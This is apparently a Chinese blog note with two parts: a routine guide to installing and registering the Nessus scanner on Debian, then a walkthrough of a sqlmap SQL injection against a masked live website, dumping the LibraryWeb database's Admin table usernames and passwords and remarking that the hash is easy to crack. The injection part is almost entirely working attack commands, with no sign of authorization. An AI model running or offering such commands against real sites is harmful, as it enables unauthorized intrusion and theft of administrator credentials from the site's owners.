debian 安装 nessus

1.下载nessus
http://www.nessus.org/products/nessus/select-your-operating-system

查看系统是32位的还是64位
manuel@manpc:~$ uname -a
Linux manpc 3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali8 i686 GNU/Linux
一般64的系统都会带有X86_64 ，而32位的都不带，一般是i386或者i686等。
选择与自己机型一致的版本

2.安装
dpkg -i Nessus-5.2.1-debian6_i386.deb

3.注册
  获取注册码
  http://www.tenable.com/products/nessus/nessus-plugins/obtain-an-activation-code

 选择 Nessus Home is free
 填写资料,到邮箱收注册码,如 : 045B-30E4-F766-C5C8-6D93

4.获取Challenge code,来下载plugins插件下载地址
   执行/opt/nessus/bin/nessus-fetch --challenge
   得到类似: acea3a8217d4972b27bbeb15c32cdd91fe671b6c

5. 这个时候打开https://127.0.0.1:8834
    会提示到下面页面注册
    https://plugins.nessus.org/offline.php
    输入3,4两步或得的注册嘛就行

6.   得到
 

  第一步:照提示下载插件all-2.0.tar.gz
   把all-2.0.tar.gz 放到/opt/nessus 目录
   然后离线安装插件
   /opt/nessus/bin/nessus-fetch --extract all-2.0.tar.gz

  第二步: copy   nessus-fetch.rc  替换原文件
    /opt/nessus/etc/nessus /nessus-fetch.rc



7. 在nessusd.conf 中将auto_update值设置为yes

8. 创建一个Nessus用户

  /opt/nessus/sbin/nessus-adduser

9. 启动Nessus服务
    Service nessus start
 登录https://127.0.0.1:8834   一定是https

一次利用sqlmap的sql简单注入实例

1.--dbs   跑数据库名

 ./sqlmap -u http://xxxx/onews_zuixin.asp?id=257 --dbs

 2. --tables  跑表名

./sqlmap -u http://xxxx/onews_zuixin.asp?id=257 --tables -D LibraryWeb


       16张表,太卡了,看的出admin表可用


 3. --columns   跑字段名
./sqlmap -u http://xxxx/onews_zuixin.asp?id=257 --columns -D LibraryWeb -T Admin




admin和password字段可用


4.  --dump   跑用户名密码数据
./sqlmap -u http://xxxx/onews_zuixin.asp?id=257 --dump -D LibraryWeb -T Admin -C "admin,password"




其实,不爆columns 表名的话,直接dump也是能爆出来密码的,如下:
./sqlmap -u http://xxxx/onews_zuixin.asp?id=257 --dump -D LibraryWeb  -T Admin



然后,解密   一看这密码就乐了,雷池加密啊,很好解的.